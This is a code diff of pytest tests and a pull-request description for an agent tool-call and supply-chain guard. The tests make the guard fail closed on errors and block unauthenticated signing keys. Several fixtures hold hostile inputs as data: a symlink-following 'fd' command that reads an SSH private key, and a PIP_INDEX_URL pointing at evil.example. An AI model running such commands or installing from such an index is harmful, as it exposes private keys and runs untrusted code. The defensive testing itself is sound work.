+    assert unrelated_env_intent is not None
+    assert "user:secret@" not in source_intent.redacted_command
+    assert "PIP_INDEX_URL=https://evil.example/simple" in source_intent.redacted_command
+    assert unrelated_env_intent.redacted_command == benign_intent.redacted_command
+
+    benign_artifact = build_package_request_artifact(
+        "codex",
+        benign_intent,
+        config_path="guard.toml",
+        source_scope="project",
+    )
+    source_artifact = build_package_request_artifact(
+        "codex",
+        source_intent,
+        config_path="guard.toml",
+        source_scope="project",
+    )
+    unrelated_env_artifact = build_package_request_artifact(
+        "codex",
+        unrelated_env_intent,
+        config_path="guard.toml",
+        source_scope="project",
+    )
+
+    assert source_artifact.artifact_id != benign_artifact.artifact_id
+    assert unrelated_env_artifact.artifact_id == benign_artifact.artifact_id
 
 
 def test_parse_package_intent_strips_non_url_env_assignments_from_redacted_command() -> None:

--- a/tests/test_guard_runtime.py
+++ b/tests/test_guard_runtime.py
@@ -977,6 +977,50 @@ clearer UX and an implementation plan with technical references.
         assert output["policy_action"] == "require-reapproval"
         assert "destructive shell command" in output["artifact_name"]
 
+    def test_codex_pre_tool_use_blocks_fd_follow_symlink_descendant_exec(
+        self,
+        monkeypatch,
+        tmp_path,
+        capsys,
+    ) -> None:
+        home_dir = tmp_path / "home"
+        workspace_dir = tmp_path / "workspace"
+        _build_guard_fixture(home_dir, workspace_dir)
+        ssh_dir = home_dir / ".ssh"
+        ssh_dir.mkdir(parents=True)
+        (ssh_dir / "id_rsa").write_text("private-key\n", encoding="utf-8")
+        src_dir = workspace_dir / "src"
+        src_dir.mkdir(parents=True)
+        (src_dir / "ssh-link").symlink_to(ssh_dir, target_is_directory=True)
+        command = "fd -L 'id_rsa' src -x sed -n '1,20p' {}"
+        event = {
+            "event": "PreToolUse",
+            "tool_name": "Bash",
+            "tool_input": {"command": command},
+            "source_scope": "project",
+        }
+        monkeypatch.setattr(sys, "stdin", io.StringIO(json.dumps(event)))
+
+        rc = main(
+            [
+                "guard",
+                "hook",
+                "--home",
+                str(home_dir),
+                "--workspace",
+                str(workspace_dir),
+                "--harness",
+                "codex",
+                "--json",
+            ]
+        )
+        output = json.loads(capsys.readouterr().out)
+
+        assert rc == 1
+        assert output["artifact_type"] == "tool_action_request"
+        assert output["policy_action"] == "require-reapproval"
+        assert output["approval_requests"]
+
     def test_codex_pre_tool_use_blocks_fd_search_path_sensitive_dir_exec(
         self,
         monkeypatch,

--- a/tests/test_guard_supply_chain_bundle.py
+++ b/tests/test_guard_supply_chain_bundle.py
@@ -161,14 +161,14 @@ def _sign_bundle_response(
     }
 
 
-def test_supply_chain_bundle_verification_accepts_rotated_keyring() -> None:
+def test_supply_chain_bundle_rejects_untrusted_signing_key_even_when_keyring_contains_trusted_key() -> None:
     old_private_key, old_public_key = _generate_key_pair()
     first_response = load_supply_chain_bundle_response(
         json.dumps(_sign_bundle_response(_bundle_dict(), private_key_pem=old_private_key))
     )
     verify_supply_chain_bundle_response(first_response, now=first_response.bundle.generated_at_timestamp + 5)
 
-    new_private_key, new_public_key = _generate_key_pair()
+    new_private_key, _new_public_key = _generate_key_pair()
     rotated_response = load_supply_chain_bundle_response(
         json.dumps(
             _sign_bundle_response(
@@ -187,12 +187,13 @@ def test_supply_chain_bundle_verification_accepts_rotated_keyring() -> None:
         )
     )
 
-    verify_supply_chain_bundle_response(
-        rotated_response,
-        trusted_keys=first_response.verification_keys,
-        cached_bundle_version=first_response.bundle.bundle_version,
-        now=rotated_response.bundle.generated_at_timestamp + 5,
-    )
+    with pytest.raises(SupplyChainBundleKeyringError):
+        verify_supply_chain_bundle_response(
+            rotated_response,
+            trusted_keys=first_response.verification_keys,
+            cached_bundle_version=first_response.bundle.bundle_version,
+            now=rotated_response.bundle.generated_at_timestamp + 5,
+        )
 
     unanchored = load_supply_chain_bundle_response(
         json.dumps(
@@ -211,7 +212,49 @@ def test_supply_chain_bundle_verification_accepts_rotated_keyring() -> None:
             now=unanchored.bundle.generated_at_timestamp + 5,
         )
 
-    assert _fingerprint(new_public_key)
+
+def test_supply_chain_bundle_accepts_trusted_signing_key_refresh() -> None:
+    private_key, _public_key = _generate_key_pair()
+    first_response = load_supply_chain_bundle_response(
+        json.dumps(_sign_bundle_response(_bundle_dict(), private_key_pem=private_key))
+    )
+    refreshed_response = load_supply_chain_bundle_response(
+        json.dumps(
+            _sign_bundle_response(
+                _bundle_dict(bundle_version="1747616400000-refresh"),
+                private_key_pem=private_key,
+            )
+        )
+    )
+
+    verify_supply_chain_bundle_response(
+        refreshed_response,
+        trusted_keys=first_response.verification_keys,
+        cached_bundle_version=first_response.bundle.bundle_version,
+        now=refreshed_response.bundle.generated_at_timestamp + 5,
+    )
+
+
+def test_supply_chain_bundle_rejects_signing_key_fingerprint_mismatch() -> None:
+    old_private_key, old_public_key = _generate_key_pair()
+    first_response = load_supply_chain_bundle_response(
+        json.dumps(_sign_bundle_response(_bundle_dict(), private_key_pem=old_private_key))
+    )
+    new_private_key, _new_public_key = _generate_key_pair()
+    spoofed_payload = _sign_bundle_response(
+        _bundle_dict(bundle_version="1747616400000-spoofed"),
+        private_key_pem=new_private_key,
+    )
+    spoofed_payload["verificationKeys"][0]["fingerprintSha256"] = _fingerprint(old_public_key)
+    spoofed_response = load_supply_chain_bundle_response(json.dumps(spoofed_payload))
+
+    with pytest.raises(SupplyChainBundleKeyringError):
+        verify_supply_chain_bundle_response(
+            spoofed_response,
+            trusted_keys=first_response.verification_keys,
+            cached_bundle_version=first_response.bundle.bundle_version,
+            now=spoofed_response.bundle.generated_at_timestamp + 5,
+        )
 
 
 def test_supply_chain_bundle_rejects_payload_hash_mismatch_and_rollback() -> None:

--- a/tests/test_guard_supply_chain_evaluator.py
+++ b/tests/test_guard_supply_chain_evaluator.py
@@ -19,12 +19,12 @@ from cryptography.hazmat.primitives.asymmetric import padding
 from cryptography.hazmat.primitives.asymmetric.rsa import RSAPrivateKey, generate_private_key
 
 import codex_plugin_scanner.guard.runtime.supply_chain_package_eval as evaluator_module
-from codex_plugin_scanner.guard.runtime.package_manifest_diff import _DeadlineExceededError
 from codex_plugin_scanner.guard.runtime.package_intent_common import (
     PackageIntent,
     build_package_request_artifact,
     js_target,
 )
+from codex_plugin_scanner.guard.runtime.package_manifest_diff import _DeadlineExceededError
 from codex_plugin_scanner.guard.runtime.supply_chain_package_eval import (
     PackageRequestEvaluation,
     SupplyChainUserCopy,
@@ -539,8 +539,11 @@ def test_evaluate_package_request_artifact_handles_upgrade_required_with_premium
     assert "upgrade" in result.user_copy.title.lower()
 
 
-def test_evaluate_package_request_artifact_falls_back_on_cloud_http_error(
-    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+@pytest.mark.parametrize("status_code", [400, 401, 403, 404])
+def test_evaluate_package_request_artifact_fails_closed_on_untrusted_cloud_http_error(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+    status_code: int,
 ) -> None:
     store = GuardStore(tmp_path / "guard-home")
     store.set_sync_credentials(
@@ -569,8 +572,8 @@ def test_evaluate_package_request_artifact_falls_back_on_cloud_http_error(
     def raise_http_error(*args: object, **kwargs: object) -> object:
         raise urllib.error.HTTPError(
             "https://hol.org/guard/supply-chain/evaluate",
-            401,
-            "unauthorized",
+            status_code,
+            "cloud evaluation failed",
             {},
             None,
         )
@@ -583,12 +586,14 @@ def test_evaluate_package_request_artifact_falls_back_on_cloud_http_error(
         now="2026-05-19T00:00:00Z",
     )
 
-    assert result.decision == "monitor"
-    assert result.policy_action == "allow"
-    assert result.enforcement in {"offline_cached", "local_fallback"}
+    assert result.decision == "ask"
+    assert result.policy_action == "require-reapproval"
+    assert result.enforcement == "premium_cloud"
+    expected_code = "cloud_auth_error" if status_code in {401, 403} else "cloud_validation_error"
+    assert any(reason["code"] == expected_code for reason in result.reasons)
 
 
-def test_evaluate_package_request_artifact_falls_back_on_invalid_cloud_response(
+def test_evaluate_package_request_artifact_fails_closed_on_invalid_cloud_response(
     tmp_path: Path, monkeypatch: pytest.MonkeyPatch
 ) -> None:
     store = GuardStore(tmp_path / "guard-home")
@@ -626,9 +631,10 @@ def test_evaluate_package_request_artifact_falls_back_on_invalid_cloud_response(
         now="2026-05-19T00:00:00Z",
     )
 
-    assert result.decision == "monitor"
-    assert result.policy_action == "allow"
-    assert result.enforcement in {"offline_cached", "local_fallback"}
+    assert result.decision == "ask"
+    assert result.policy_action == "require-reapproval"
+    assert result.enforcement == "premium_cloud"
+    assert any(reason["code"] == "cloud_validation_error" for reason in result.reasons)
 
 
 def test_evaluate_package_request_artifact_ignores_malformed_cached_bundle(
@@ -1089,7 +1095,14 @@ def test_transitive_lockfile_resolution_uses_bounded_deadline(
     workspace_dir = tmp_path / "workspace"
     workspace_dir.mkdir()
     (workspace_dir / "package-lock.json").write_text(
-        json.dumps({"packages": {"": {"name": "demo-app"}, "node_modules/react/node_modules/minimist": {"version": "1.2.8"}}}),
+        json.dumps(
+            {
+                "packages": {
+                    "": {"name": "demo-app"},
+                    "node_modules/react/node_modules/minimist": {"version": "1.2.8"},
+                }
+            }
+        ),
         encoding="utf-8",
     )
     captured: dict[str, float] = {}
@@ -1134,7 +1147,14 @@ def test_transitive_lockfile_timeout_surfaces_warn_result(
     workspace_dir = tmp_path / "workspace"
     workspace_dir.mkdir()
     (workspace_dir / "package-lock.json").write_text(
-        json.dumps({"packages": {"": {"name": "demo-app"}, "node_modules/react/node_modules/minimist": {"version": "1.2.8"}}}),
+        json.dumps(
+            {
+                "packages": {
+                    "": {"name": "demo-app"},
+                    "node_modules/react/node_modules/minimist": {"version": "1.2.8"},
+                }
+            }
+        ),
         encoding="utf-8",
     )
     monkeypatch.setattr(

--- a/tests/test_guard_tier2_supply_chain_phase13.py
+++ b/tests/test_guard_tier2_supply_chain_phase13.py
@@ -337,9 +337,11 @@ def test_evaluate_package_request_artifact_uses_monitor_only_fallback_for_unsupp
     assert result.packages[0]["reasons"][0]["code"] == "unsupported_ecosystem_monitor_only"
 
 
-def test_evaluate_package_request_artifact_surfaces_malformed_tier2_lockfiles_without_crashing(
+def test_evaluate_package_request_artifact_fails_closed_when_tier2_range_lockfile_parse_error_hides_cached_advisory(
     tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
 ) -> None:
+    home_dir = tmp_path / "home"
     workspace_dir = tmp_path / "workspace"
     workspace_dir.mkdir()
     write_text(
@@ -355,14 +357,32 @@ clap = "4.5"
         + "\n",
     )
     write_text(workspace_dir / "Cargo.lock", "version = [\n")
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    ecosystem="cargo",
+                    name="clap",
+                    version="4.5.7",
+                    default_action="block",
+                    recommended_fix_version="4.5.8",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
 
     artifact = artifact_from_command_fixture("cargo add clap@^4.5", workspace=workspace_dir)
     result = evaluate_package_request_artifact(
         artifact=artifact,
-        store=GuardStore(tmp_path / "home"),
+        store=store,
         workspace_dir=workspace_dir,
     )
 
-    assert result.decision == "monitor"
+    assert result.decision == "ask"
+    assert result.policy_action == "require-reapproval"
     assert any(reason["code"] == "lockfile_parse_error" for reason in result.reasons)
     assert result.packages[0]["supportLevel"] == "beta"


### PR DESCRIPTION
## Summary
- fail closed on malformed lockfile and cloud auth/validation package-evaluation paths
- bind package-source envs and compound shell package segments into package intent identity
- authenticate bundle signing keys and block symlink-following `fd` source-inspection bypasses
- preserve empty package sync shim DX while keeping real package material fail-closed

## Alerts
- SA005
- SA006
- SA008
- SA010
- SA011
- SA014

## Verification
- uv run ruff check src/codex_plugin_scanner/guard/runtime/supply_chain_bundle_runtime.py src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py src/codex_plugin_scanner/guard/runtime/package_intent_parser.py src/codex_plugin_scanner/guard/runtime/false_positive_rules.py src/codex_plugin_scanner/guard/runtime/secret_file_requests.py src/codex_plugin_scanner/guard/cli/commands.py tests/test_guard_supply_chain_bundle.py tests/test_guard_supply_chain_evaluator.py tests/test_guard_tier2_supply_chain_phase13.py tests/test_guard_package_intent.py tests/test_guard_python_package_intent_phase12.py tests/test_guard_detector_fp.py tests/test_guard_runtime.py tests/test_guard_package_shims.py
- uv run pytest tests/test_guard_supply_chain_bundle.py tests/test_guard_supply_chain_evaluator.py tests/test_guard_tier2_supply_chain_phase13.py tests/test_guard_package_intent.py tests/test_guard_python_package_intent_phase12.py tests/test_guard_detector_fp.py tests/test_guard_runtime.py tests/test_guard_package_shims.py -q
- uv run pytest -q